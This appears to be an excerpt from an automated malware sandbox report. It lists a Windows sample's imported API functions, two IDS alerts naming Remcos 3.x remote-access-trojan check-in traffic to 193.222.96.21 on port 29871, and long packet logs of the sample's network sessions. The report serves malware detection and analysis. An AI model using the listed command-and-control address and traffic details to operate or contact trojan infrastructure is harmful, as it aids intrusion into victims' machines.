KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Language of compilation system | Country where language is spoken | Map
English | United States |

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/19/24-19:12:11.492624 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 29871 | 49738 | 193.222.96.21 | 192.168.2.4
04/19/24-19:12:11.262632 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 49738 | 29871 | 192.168.2.4 | 193.222.96.21

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 19, 2024 19:12:08.806940079 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38
Apr 19, 2024 19:12:08.806982040 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4
Apr 19, 2024 19:12:08.807054043 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38
Apr 19, 2024 19:12:08.860527992 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38
Apr 19, 2024 19:12:08.860551119 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4
Apr 19, 2024 19:12:09.092659950 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4
Apr 19, 2024 19:12:09.092856884 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38
Apr 19, 2024 19:12:09.238075972 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38
Apr 19, 2024 19:12:09.238097906 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4
Apr 19, 2024 19:12:09.238985062 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4
Apr 19, 2024 19:12:09.239056110 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38
Apr 19, 2024 19:12:09.289612055 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38
Apr 19, 2024 19:12:09.336118937 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4
Apr 19, 2024 19:12:09.414328098 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4
Apr 19, 2024 19:12:09.414452076 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4
Apr 19, 2024 19:12:09.414565086 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4
Apr 19, 2024 19:12:09.414613008 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38
Apr 19, 2024 19:12:09.414628029 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4
Apr 19, 2024 19:12:09.414732933 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38
Apr 19, 2024 19:12:09.414741039 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4
Apr 19, 2024 19:12:09.414768934 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.414814949 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.414865971 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.414875031 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.414943933 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.414952040 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.415038109 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.415047884 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.415115118 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.415122032 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.415216923 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.415225029 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.415294886 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.415302038 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.415383101 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.415394068 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.415410042 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.415487051 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.415499926 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.415579081 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.415962934 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.416047096 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.416054010 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.416126966 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.416134119 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.416225910 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.416232109 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.416301012 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.416307926 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.416331053 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.416412115 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.416920900 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.416992903 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.417025089 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.417113066 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.417119980 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.417191029 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.417205095 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.417284966 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.417292118 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.417361975 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.417812109 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.417886019 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.417897940 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.417969942 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.417983055 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.418076992 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.418083906 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.418153048 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.418159008 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.418242931 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.418250084 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.418318033 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.418740988 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.418819904 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.418827057 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.418895960 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.418903112 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.418988943 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.418994904 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.419064999 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.419070959 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.419154882 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.419517994 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.419596910 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.419615984 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.419675112 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.419698000 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.419768095 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.419780016 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.419845104 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.419861078 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.419938087 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.420654058 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.420737028 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.518598080 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.518696070 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.519109011 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.519176960 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.519212961 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.519278049 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.520042896 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.520126104 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.520163059 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.520220041 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.520875931 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.520946980 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.520981073 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.521044970 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.521802902 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.521869898 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.521898985 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.521951914 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.522767067 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.522830009 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.522861004 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.522927046 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.523473024 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.523542881 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.523567915 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.523622990 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.524630070 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.524697065 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.524736881 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.524810076 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.525425911 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.525491953 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.622899055 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.623059034 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.623092890 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.623106003 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.623231888 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.623678923 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.623791933 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.623811960 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.623897076 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.623919964 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.623996973 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.624016047 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.624102116 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.624597073 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.624686956 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.625231981 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.625328064 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.625334978 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.625366926 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.625410080 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.625461102 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.626044035 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.626141071 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.626141071 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.626168013 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.626230001 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.626971960 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.627064943 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.627074003 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.627099037 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.627156019 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.627194881 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.627875090 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.627968073 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.628740072 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.628837109 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.628959894 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.629053116 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.629062891 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.629137993 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.629833937 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.629926920 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.629935026 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.629957914 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.630007982 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.630053997 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.630717993 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.630810976 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.631550074 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.631643057 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.631650925 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.631720066 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.632612944 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.632704973 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.633649111 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.633668900 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.633708000 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.633754969 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.633764982 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.633814096 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.635445118 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.635488987 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.635548115 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.635555983 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.635621071 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.637285948 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.637360096 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.637387991 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:12.929816008 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929816961 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929836988 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929837942 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929857016 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929873943 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929889917 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929891109 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929908037 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929910898 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929925919 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929944038 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929958105 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929980040 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929996014 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930012941 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930030107 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930047989 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930049896 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930066109 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930083036 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930088043 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930099964 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930118084 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930124044 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930139065 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930154085 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930155993 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930172920 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930191040 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930208921 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930228949 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930228949 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930236101 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930253029 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930269957 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930286884 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930289984 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930305004 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930306911 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930325985 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930344105 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930358887 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930361986 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930382013 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930383921 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930398941 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930417061 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930433035 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930433989 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930449963 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930455923 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930469036 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930486917 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930488110 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930505991 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930526018 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930545092 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930563927 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.132117987 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.132153034 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.132174969 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.132194996 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.132308960 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.132308960 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133141994 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133171082 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133188963 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133209944 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133213997 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133229017 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133245945 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133248091 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133269072 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133285999 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133305073 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133305073 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133322001 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133326054 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133342028 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133358002 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133359909 CEST2987149739193.222.96.21192.168.2.4
